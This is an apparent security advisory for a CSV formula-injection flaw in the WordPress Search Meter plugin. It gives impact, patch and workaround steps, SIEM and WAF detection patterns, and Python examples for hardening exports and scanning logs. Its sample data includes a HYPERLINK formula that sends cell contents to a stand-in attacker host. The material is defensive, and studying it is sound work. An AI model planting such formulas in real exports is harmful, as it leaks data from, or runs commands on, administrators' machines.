CVE-2020-11548

9.8 CRITICAL

📋 TL;DR

Search Meter records the terms visitors type into a WordPress site's search box and lets an administrator export them as CSV from wp-admin/index.php?page=search-meter. Versions through 2.13.2 write the recorded terms to the CSV unmodified, so any visitor can submit a search beginning with =, +, -, or @ that a spreadsheet application treats as a formula when the administrator opens the export (CSV/formula injection). Depending on the spreadsheet and its settings, the formula can leak data from the workbook or run commands on the administrator's workstation; the web server itself never evaluates it.
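The mechanism in miniature, as an added example that is not the plugin's own code: a vulnerable export writes recorded search terms straight into the CSV, a hardened export neutralizes any cell that a spreadsheet would read as a formula, and an audit function checks an exported file for cells that still begin with a formula character. The search terms and hit counts are constructed for the example; the formulas are deliberately harmless, and the single-quote prefix follows the OWASP CSV-injection guidance rather than anything the plugin's fix is documented to do.

```python
import csv
import io

# Constructed (term, hit count) rows standing in for Search Meter's recorded searches.
# The formulas are deliberately harmless; a real payload uses the same entry point.
SAMPLE_ROWS = [
    ("wordpress backup", 12),
    ("=1+1", 1),
    ('=HYPERLINK("https://attacker.example/?"&A1,"click me")', 1),
    ("@SUM(1,1)", 1),
    ("+1", 1),
    ("-1", 1),
    ("\t=1+1", 1),  # a leading tab is also taken as a formula start by some spreadsheets
    ('plain "quoted" term', 3),
]

# Characters that Excel and LibreOffice treat as the start of a formula when a
# CSV cell is imported (OWASP CSV-injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def export_vulnerable(rows):
    """Write search terms to CSV unmodified: the behaviour the advisory describes."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["search_term", "hits"])
    writer.writerows(rows)
    return buf.getvalue()


def neutralize_cell(value):
    """Return the cell as inert text: prefix a single quote when it would be read as a formula.

    The quote is visible in the spreadsheet cell; that cosmetic cost is the trade-off
    for never evaluating visitor-supplied input. Non-string values (hit counts) pass through.
    """
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_hardened(rows):
    """Same export with every cell neutralized before it reaches the CSV writer."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["search_term", "hits"])
    for row in rows:
        writer.writerow([neutralize_cell(v) for v in row])
    return buf.getvalue()


def dangerous_cells(csv_text):
    """Audit an exported CSV: (row, column) positions whose cell starts with a formula trigger."""
    found = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                found.append((r, c))
    return found


if __name__ == "__main__":
    print(export_vulnerable(SAMPLE_ROWS))
    print("vulnerable export, formula-leading cells:", dangerous_cells(export_vulnerable(SAMPLE_ROWS)))
    print("hardened export, formula-leading cells:", dangerous_cells(export_hardened(SAMPLE_ROWS)))
```

Note that quoting the cell in the CSV does not help: Excel evaluates `"=1+1"` exactly as it evaluates `=1+1`, which is why the prefix has to be inside the cell text. `dangerous_cells` is also a quick way to check an export you already have on disk before opening it.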

💻 Affected Systems

Products:
  • WordPress Search Meter plugin
Versions: through 2.13.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress administrator to export search data via wp-admin/index.php?page=search-meter Export feature.

📦 What is this software?

Search Meter is a WordPress plugin that logs the terms visitors type into the site's search box, reports the most frequent and the unsuccessful searches in the admin dashboard, and can export the recorded search data as CSV. That export is what writes visitor-controlled text into a file an administrator will open in a spreadsheet.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Code execution on the administrator's workstation when the exported CSV is opened in a spreadsheet with external links or DDE allowed, giving the attacker a foothold on a machine that holds WordPress administrator credentials; from there the site and its hosting environment can be fully compromised.

🟠

Likely Case

The administrator opens the export in a spreadsheet and is prompted about external content; if the prompt is accepted, an injected formula can exfiltrate other cells of the export (for example through a hyperlink or external-data function) or run a command on the workstation. Current spreadsheet defaults warn before DDE and external links, so some click-through is usually required.

🟢

If Mitigated

Limited impact if the plugin neutralizes formula-leading cells on export and administrators open exports with external content disabled; the attacker's search terms still land in the search log, but only as inert text.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: Partial (the search term is injected without authentication; the formula only fires when an administrator exports and opens the CSV)
Complexity: LOW

Exploitation requires an administrator to export the search log as CSV and open it in a spreadsheet after the attacker has submitted a search term that begins with a formula character.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.13.3 or later

Vendor Advisory: https://wordpress.org/plugins/search-meter/#developers

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Search Meter plugin.
4. Click 'Update Now' if available.
5. Alternatively, download the latest version from the WordPress plugin repository and replace the plugin files.

🔧 Temporary Workarounds

Disable Search Meter plugin

Platform: all

Temporarily deactivate the vulnerable plugin until it is patched.

wp plugin deactivate search-meter

Restrict admin export access

Platform: all

Stop using the export at wp-admin/index.php?page=search-meter until the plugin is updated. If the data is needed, review it in a text editor or import it into the spreadsheet as text with formula evaluation and external links disabled.

🧯 If You Can't Patch

  • Disable the Search Meter plugin immediately (wp plugin deactivate search-meter)
  • Add a web application firewall rule that blocks or logs search requests (the s parameter) whose decoded value begins with =, +, -, @, a tab or a carriage return; expect some false positives from legitimate searches that start with "-"
  • Tell administrators not to open the Search Meter CSV export in a spreadsheet until the plugin is updated

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Search Meter version. If version is 2.13.2 or earlier, system is vulnerable.

Check Version:

wp plugin get search-meter --field=version

Verify Fix Applied:

Confirm Search Meter plugin version is 2.13.3 or later in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • Search requests (the s parameter, GET or POST) whose URL-decoded value begins with =, +, -, @, a tab or a carriage return
  • Requests to wp-admin/index.php?page=search-meter by an administrator shortly after such search terms were recorded
  • Exported CSV files containing cells that begin with a formula character

Network Indicators:

  • HTTP requests (GET or POST) to wp-admin/index.php with the page=search-meter parameter; these are legitimate admin actions, so correlate them with suspicious search terms rather than alerting on them alone
  • Outbound connections from an administrator's workstation to unfamiliar hosts immediately after a CSV export is opened (a spreadsheet following an injected hyperlink or external-data formula)

SIEM Query:

source="wordpress.log" | regex _raw="[?&]s=(%3D|%2B|%2D|%40|%09|%0D|=|\+|-|@)"

source="wordpress.log" AND "wp-admin/index.php" AND "page=search-meter"

Anchor the match on the search parameter: matching lone "=", "+", "-" or "@" characters anywhere in the line matches almost every request, since query strings contain "=" by definition. Note that a literal "+" in a search term arrives as %2B, because a bare "+" decodes to a space.
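The same detection logic run offline over web server access logs, as an added example rather than anything shipped with the plugin or the page's SIEM: it parses combined-format lines, URL-decodes the s parameter, flags values that begin with a formula character, flags hits on the Search Meter admin page, and pairs each admin hit with the suspicious terms recorded before it. The log lines are constructed; the admin page is matched only on page=search-meter because this page does not document what the real export request looks like beyond that.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log lines for this example (not real site logs).
# The admin hit is shown with only page=search-meter; the real export request may carry
# further parameters that this page does not document.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Apr/2020:10:14:02 +0000] "GET /?s=wordpress+backup HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Apr/2020:10:14:09 +0000] "GET /?s=%3DHYPERLINK%28%22https%3A%2F%2Fattacker.example%22%2C%22x%22%29 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Apr/2020:10:14:15 +0000] "GET /?s=%40SUM%281%2C1%29 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Apr/2020:10:15:30 +0000] "GET /?s=-site%3Aexample HTTP/1.1" 200 4900 "-" "Mozilla/5.0"
192.0.2.44 - admin [05/Apr/2020:11:02:41 +0000] "GET /wp-admin/index.php?page=search-meter HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters a spreadsheet treats as the start of a formula in an imported CSV cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes values and turns '+' into a space, so a literal '+'
    # payload must have been sent as %2B to survive decoding.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def scan_log(text):
    """Return events of interest: formula-leading search terms and Search Meter admin page hits."""
    events = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for term in rec["query"].get("s", []):
            if term.startswith(FORMULA_TRIGGERS):
                events.append({"kind": "formula_search", "ip": rec["ip"], "ts": rec["ts"], "term": term})
        if rec["path"].endswith("/wp-admin/index.php") and "search-meter" in rec["query"].get("page", []):
            events.append({"kind": "export", "ip": rec["ip"], "ts": rec["ts"], "user": rec["user"]})
    return events


def exports_after_injection(events):
    """Pair each Search Meter admin hit with the formula-leading terms logged before it."""
    out = []
    for ev in events:
        if ev["kind"] != "export":
            continue
        prior = [e["term"] for e in events if e["kind"] == "formula_search" and e["ts"] < ev["ts"]]
        if prior:
            out.append({"user": ev["user"], "ts": ev["ts"], "pending_terms": prior})
    return out


if __name__ == "__main__":
    evs = scan_log(SAMPLE_LOG)
    for e in evs:
        print(e)
    for hit in exports_after_injection(evs):
        print("admin", hit["user"], "hit the Search Meter page with",
              len(hit["pending_terms"]), "formula-leading terms logged earlier")
```

The "-site:example" line is flagged too: a leading "-" is a legitimate search syntax for some users, so the formula_search events are a triage queue, and the pairing with a later admin page hit is what should raise the priority.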

🔗 References
